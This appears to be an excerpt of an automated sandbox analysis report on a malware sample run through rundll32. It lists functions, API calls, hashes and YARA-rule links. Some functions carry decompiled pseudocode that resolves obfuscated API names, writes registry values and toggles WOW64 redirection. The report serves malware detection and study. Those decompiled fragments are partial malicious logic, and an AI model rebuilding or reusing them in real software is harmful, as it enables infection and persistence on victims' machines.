Part of subcall function 70344589: SetLastError.KERNEL32(00000000,7038C130,000000FF,?,?,?,70340192), ref: 7034462C

_free.LIBCMT ref: 703470B2
_free.LIBCMT ref: 703470CB
_free.LIBCMT ref: 70347109
_free.LIBCMT ref: 70347112
_free.LIBCMT ref: 7034711E

Strings

C, xrefs: 70346F01

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: d5f1059267bf1306702cc274412b782801cc0f7329f13d406b69184009f6cf60
Instruction ID: 2c1f0f9ac6fdddfe1a41988ccad8bac1c04031b60929aff471c7ad425d2ca841
Opcode Fuzzy Hash: d5f1059267bf1306702cc274412b782801cc0f7329f13d406b69184009f6cf60
Instruction Fuzzy Hash: 09B13975A012199FDB25DF18C884AADB7F5FF48304F6155AEE84AAB390D731AE81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 7034CF46, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 7034CC92: _free.LIBCMT ref: 7034CCB7

_free.LIBCMT ref: 7034CF94

Part of subcall function 70341970: HeapFree.KERNEL32(00000000,00000000,?,7033F811,00000000), ref: 70341986
Part of subcall function 70341970: GetLastError.KERNEL32(?,?,7033F811,00000000), ref: 70341998

_free.LIBCMT ref: 7034CF9F
_free.LIBCMT ref: 7034CFAA
_free.LIBCMT ref: 7034CFFE
_free.LIBCMT ref: 7034D009
_free.LIBCMT ref: 7034D014
_free.LIBCMT ref: 7034D01F

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4ba7fa873fd7c2e276ecd51b6b1c4529bc7a1444023a1b325a9de5ddacde5e4d
Instruction ID: eb916fa073dc63bca739da1835578e812b57a66a7e3abdccd42a2975bb6c32d2
Opcode Fuzzy Hash: 4ba7fa873fd7c2e276ecd51b6b1c4529bc7a1444023a1b325a9de5ddacde5e4d
Instruction Fuzzy Hash: 64114732551B04BED660ABB0CC86FEFB7DCAF01700F409814B2AEAE151DA24B9478A94

Uniqueness

Uniqueness Score: -1.00%

Function 7033F8B4, Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,7033F784), ref: 7033F8C2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 7033F8D0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 7033F8E9
SetLastError.KERNEL32(00000000,?,7033F784), ref: 7033F93B

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 943e95d7ba081a3ee60c291c0c73142afc31bea221bd76fc26fd090e1c047545
Instruction ID: bb6088d86483139a89ead5cfb8974b2f93ff8faff7c794ca3cb480ff5c3b083c
Opcode Fuzzy Hash: 943e95d7ba081a3ee60c291c0c73142afc31bea221bd76fc26fd090e1c047545
Instruction Fuzzy Hash: 45019E33218711BEEA1516766CC671EBA9DEB196BABF0032AF119880F4EB6198465150

Uniqueness

Uniqueness Score: -1.00%

Function 7034365A, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,00000000), ref: 703436A2
__fassign.LIBCMT ref: 70343881
__fassign.LIBCMT ref: 7034389E
WriteFile.KERNEL32(?,00000020,00000000,?,00000000), ref: 703438E6
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 70343926
GetLastError.KERNEL32 ref: 703439D2

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 1f430becb5059759169f749e72df886d16b0c96d613a3fc6a59ca029361ed070
Instruction ID: f6038f146a362a340d895c825a61f1c5485c2f5611d270a3dff85b2960841e59
Opcode Fuzzy Hash: 1f430becb5059759169f749e72df886d16b0c96d613a3fc6a59ca029361ed070
Instruction Fuzzy Hash: 5AD19CB5D002589FDB05CFA8C980AEDBBF9EF48350F24516EE85ABB341D734A946CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C24DA1, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00C24DFD
SysAllocString.OLEAUT32(0070006F), ref: 00C24E11
SysAllocString.OLEAUT32(00000000), ref: 00C24E23
SysFreeString.OLEAUT32(00000000), ref: 00C24E87
SysFreeString.OLEAUT32(00000000), ref: 00C24E96
SysFreeString.OLEAUT32(00000000), ref: 00C24EA1

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 64550afc468e86be70459df75ad72d4e5c885d123ce6bc793631ab6c6712590a
Instruction ID: 615cd9ff216ab87d2c20f338530b3e2a40b01ee7b885f2703822dfd400dad856
Opcode Fuzzy Hash: 64550afc468e86be70459df75ad72d4e5c885d123ce6bc793631ab6c6712590a
Instruction Fuzzy Hash: 2F313E32900619AFDB11DFA8D844A9FB7BAFF49310F154465E910EB260DB71AE06CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C26ACC, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C26ACC(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00C25FBC(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xc2a2d4; // 0x449d5a8
					_t1 = _t23 + 0xc2b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xc2a2d4; // 0x449d5a8
					_t2 = _t26 + 0xc2b787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00C213CC(_t54);
					} else {
						_t30 =  *0xc2a2d4; // 0x449d5a8
						_t5 = _t30 + 0xc2b774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xc2a2d4; // 0x449d5a8
							_t7 = _t33 + 0xc2b797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xc2a2d4; // 0x449d5a8
								_t9 = _t36 + 0xc2b756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xc2a2d4; // 0x449d5a8
									_t11 = _t39 + 0xc2b7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00C26EB3(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00c26adb
0x00c26adf
0x00c26ba1
0x00c26ae5
0x00c26ae5
0x00c26aea
0x00c26afd
0x00c26aff
0x00c26b04
0x00c26b0c
0x00c26b13
0x00c26b17
0x00c26b1a
0x00c26b99
0x00c26b9a
0x00c26b1c
0x00c26b1c
0x00c26b21
0x00c26b29
0x00c26b2d
0x00c26b30
0x00000000
0x00c26b32
0x00c26b32
0x00c26b37
0x00c26b3f
0x00c26b43
0x00c26b46
0x00000000
0x00c26b48
0x00c26b48
0x00c26b4d
0x00c26b55
0x00c26b59
0x00c26b5c
0x00000000
0x00c26b5e
0x00c26b5e
0x00c26b63
0x00c26b6b
0x00c26b6f
0x00c26b72
0x00000000
0x00c26b74
0x00c26b7a
0x00c26b7f
0x00c26b86
0x00c26b8d
0x00c26b90
0x00000000
0x00c26b92
0x00c26b95
0x00c26b95
0x00c26b90
0x00c26b72
0x00c26b5c
0x00c26b46
0x00c26b30
0x00c26b1a
0x00c26baf

APIs

Part of subcall function 00C25FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00C22035), ref: 00C25FC8

GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00C22F2E,?,?,?,?,00000000,00000000), ref: 00C26AF1
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00C26B13
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00C26B29
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00C26B3F
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00C26B55
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00C26B6B

Part of subcall function 00C26EB3: memset.NTDLL ref: 00C26F32

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 98b0e77cef4a85eab8b0afebdf10c2a0390211201128ad3662a7d7c8bbae09b9
Instruction ID: c00cf90d503d1e062ee740ed0db3fa0a552cafd5cbfd7b58b3488bdbfa3faaa9
Opcode Fuzzy Hash: 98b0e77cef4a85eab8b0afebdf10c2a0390211201128ad3662a7d7c8bbae09b9
Instruction Fuzzy Hash: 09219FB160061AEFDB60DFA9EC44F6A77ECEB48740B04446AE909C7A11D734EE01AF70

Uniqueness

Uniqueness Score: -1.00%

Function 7034AA96, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 7034AAE4
_free.LIBCMT ref: 7034AC30

Strings

*?, xrefs: 7034AAD9

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: _free_strpbrk
String ID: *?
API String ID: 3300345361-2564092906
Opcode ID: 147178e998457f0a426a615fc2974551bc7775d33b639b4f134587b6cd3a8a8a
Instruction ID: b0038d841f59a8ce42cd099b5211c2ac6b4205dc4c8522a1672ba9d25c374dee
Opcode Fuzzy Hash: 147178e998457f0a426a615fc2974551bc7775d33b639b4f134587b6cd3a8a8a
Instruction Fuzzy Hash: 646140B6E006199FCB15CFA8C8815EDFBF6EF48310B259169E815EB300D735AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00C25448, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00C25448(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0xc2a38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E00C23FC1( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E00C269FD(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E00C213CC(_a8);
						goto L29;
					}
					_t64 =  *0xc2a2cc; // 0x50c9cd0
					_t16 = _t64 + 0xc; // 0x50c9dc4
					_t65 = E00C23FC1(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d00c290
						if(E00C21E65(_t97,  *_t33, _t91, _a8,  *0xc2a384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0xc2a2d4; // 0x449d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0xc2b9ef; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0xc2b907; // 0x55434b48
								_t69 = _t34;
							}
							if(E00C26414(_t69,  *0xc2a384,  *0xc2a388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0xc2a2d4; // 0x449d5a8
									_t44 = _t71 + 0xc2b892; // 0x74666f53
									_t73 = E00C23FC1(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d00c290
										E00C2304F( *_t47, _t91, _a8,  *0xc2a388, _a24);
										_t49 = _t101 + 0x10; // 0x3d00c290
										E00C2304F( *_t49, _t91, _t99,  *0xc2a380, _a16);
										E00C213CC(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d00c290
									E00C2304F( *_t40, _t91, _a8,  *0xc2a388, _a24);
									_t43 = _t101 + 0x10; // 0x3d00c290
									E00C2304F( *_t43, _t91, _a8,  *0xc2a380, _a16);
								}
								if( *_t101 != 0) {
									E00C213CC(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d00c290
					_t81 = E00C23B91( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d00c290
							E00C21E65(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E00C213CC(_t100);
						_t98 = _a16;
					}
					E00C213CC(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E00C277FF(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0xc2a38c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x00c25448
0x00c25451
0x00c25458
0x00c2545d
0x00c254ca
0x00c254d0
0x00c254d5
0x00c254dc
0x00c254e3
0x00c254e6
0x00c25651
0x00c25658
0x00c25658
0x00c2565d
0x00c2565f
0x00c2565f
0x00c25668
0x00c25668
0x00c254ec
0x00c254f8
0x00c25647
0x00c2564a
0x00000000
0x00c2564a
0x00c254fe
0x00c25503
0x00c25506
0x00c2550d
0x00c25510
0x00c25559
0x00c25559
0x00c2556c
0x00c25576
0x00c2557e
0x00c25583
0x00c2558d
0x00c2558d
0x00c25585
0x00c25585
0x00c25585
0x00c25585
0x00c255af
0x00c255b7
0x00c255e5
0x00c255ea
0x00c255f1
0x00c255f6
0x00c255fa
0x00c2562c
0x00c255fc
0x00c25609
0x00c2560c
0x00c2561c
0x00c2561f
0x00c25625
0x00c25625
0x00c255b9
0x00c255c6
0x00c255c9
0x00c255db
0x00c255de
0x00c255de
0x00c25636
0x00c25642
0x00c25638
0x00c2563b
0x00c2563b
0x00c25636
0x00c255af
0x00000000
0x00c25576
0x00c2551f
0x00c25522
0x00c25529
0x00c2552f
0x00c25532
0x00c25534
0x00c25540
0x00c25543
0x00c25543
0x00c25549
0x00c2554e
0x00c2554e
0x00c25554
0x00000000
0x00c25554
0x00c25462
0x00000000
0x00c25489
0x00c25489
0x00c25495
0x00c254a8
0x00c254ae
0x00c254b6
0x00000000
0x00c254b6

APIs

StrChrA.SHLWAPI(00C2755B,0000005F,00000000,00000000,00000104), ref: 00C2547B
lstrcpy.KERNEL32(?,?), ref: 00C254A8

Part of subcall function 00C23FC1: lstrlen.KERNEL32(?,00000000,050C9CD0,7742C740,00C235B6,050C9ED5,00C2454B,00C2454B,?,00C2454B,?,69B25F44,E8FA7DD7,00000000), ref: 00C23FC8
Part of subcall function 00C23FC1: mbstowcs.NTDLL ref: 00C23FF1
Part of subcall function 00C23FC1: memset.NTDLL ref: 00C24003

Part of subcall function 00C2304F: lstrlenW.KERNEL32(?,?,?,00C25611,3D00C290,80000002,00C2755B,00C23E52,74666F53,4D4C4B48,00C23E52,?,3D00C290,80000002,00C2755B,?), ref: 00C23074

Part of subcall function 00C213CC: RtlFreeHeap.NTDLL(00000000,00000000,00C220F3,00000000,00000000,?,00000000,?,?,?,?,?,00C268A9,00000000,?,00000001), ref: 00C213D8

lstrcpy.KERNEL32(?,00000000), ref: 00C254CA

Strings

(, xrefs: 00C2552B
\, xrefs: 00C254AE

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: f7257ce3cccff91cac6004c15bafc147e7a37992b729ab674cf78debf1235e81
Instruction ID: 6b41047ec00c08836cc041f1ea769f47ce43e8eefb464df99c5aaca381522943
Opcode Fuzzy Hash: f7257ce3cccff91cac6004c15bafc147e7a37992b729ab674cf78debf1235e81
Instruction Fuzzy Hash: 35516B71500619BFCF21DFA0EC45EAF3BBAEF08310F104414FA2592961D735DA26EB11

Uniqueness

Uniqueness Score: -1.00%

Function 7034B05B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 7034B060

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: e20d4bfaa5c4b3973fe2551dac5674f466d39cce170812ee9de59a675b46d5fc
Instruction ID: 5fe7ae9a5d81d152530fbbc469a13c0b436994695f979bf530af48b2e495eaf8
Opcode Fuzzy Hash: e20d4bfaa5c4b3973fe2551dac5674f466d39cce170812ee9de59a675b46d5fc
Instruction Fuzzy Hash: AF218071604209AFD7119FA18C92D3F77EEAF042A4B115525F529DF150EB31EC419BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C2663C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00C2663C(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E00C24DA1(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0xc2a2d4; // 0x449d5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0xc2b4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0xc2b90c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0xc2a100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x00c2663c
0x00c26643
0x00c26647
0x00c2664c
0x00c26653
0x00c26656
0x00c26660
0x00c26665
0x00c26671
0x00c26678
0x00c26682
0x00c26682
0x00c2667a
0x00c2667a
0x00c2667a
0x00c2667a
0x00c26688
0x00c2668b
0x00c26693
0x00c26696
0x00c26699
0x00c2669c
0x00c266a1
0x00c266aa
0x00c266b7
0x00c266ac
0x00c266b2
0x00c266b2
0x00c266bd
0x00c266bd
0x00c266c5

APIs

Part of subcall function 00C24DA1: SysAllocString.OLEAUT32(?), ref: 00C24DFD
Part of subcall function 00C24DA1: SysAllocString.OLEAUT32(0070006F), ref: 00C24E11
Part of subcall function 00C24DA1: SysAllocString.OLEAUT32(00000000), ref: 00C24E23
Part of subcall function 00C24DA1: SysFreeString.OLEAUT32(00000000), ref: 00C24E87

memset.NTDLL ref: 00C26660
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00C2669C
GetLastError.KERNEL32 ref: 00C266AC
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00C266BD

Strings

<, xrefs: 00C26671

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: 2831c655dc08685b1a796c5381c0470fa33f0a4f14550a74476c02080ac3f636
Instruction ID: d5f368822ba41d9dfdef9651764d1f899ac5145c6c1deb57f5e9b5cd2738fc70
Opcode Fuzzy Hash: 2831c655dc08685b1a796c5381c0470fa33f0a4f14550a74476c02080ac3f636
Instruction Fuzzy Hash: 4F1109B1900228EBDB10EFA5E885BDE7BBCBB08390F048016F905E7651D774AA44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 7034691A, Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 703419AA: RtlAllocateHeap.NTDLL(00000000,?), ref: 703419DC

_free.LIBCMT ref: 70346A29
_free.LIBCMT ref: 70346A40
_free.LIBCMT ref: 70346A5D
_free.LIBCMT ref: 70346A78
_free.LIBCMT ref: 70346A8F

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: f689bacf14858d21a8ea771131a1d837fba32f2774fbd013c9c61268ac4c1bc1
Instruction ID: e030ca7f6c4c4b88f6d626fb606ffe64f9d8e1dd36fefaef968096e31e71a9f4
Opcode Fuzzy Hash: f689bacf14858d21a8ea771131a1d837fba32f2774fbd013c9c61268ac4c1bc1
Instruction Fuzzy Hash: 6A518FB2A00605AFDB11CF69C981A7EB7F5EF45220B15656DF40AEF250E731ED418B81

Uniqueness

Uniqueness Score: -1.00%

Function 00C22D0E, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E00C22D0E(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E00C25FBC(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E00C213CC(_v16);
								goto L37;
							}
							_t103 = E00C25FBC((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0xc2a2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x00c22d15
0x00c22d1c
0x00c22d21
0x00c22d24
0x00c22d2b
0x00c22d2e
0x00c22d31
0x00c22d38
0x00c22d3b
0x00c22e8f
0x00c22e91
0x00c22e93
0x00c22e98
0x00c22e98
0x00c22d41
0x00c22d44
0x00c22d47
0x00c22d49
0x00c22d49
0x00c22d4d
0x00000000
0x00000000
0x00c22d51
0x00c22d7d
0x00c22d82
0x00c22d84
0x00c22d84
0x00c22d87
0x00c22d8a
0x00c22d8a
0x00c22d8c
0x00000000
0x00c22d57
0x00c22d59
0x00c22d78
0x00c22d78
0x00c22d8f
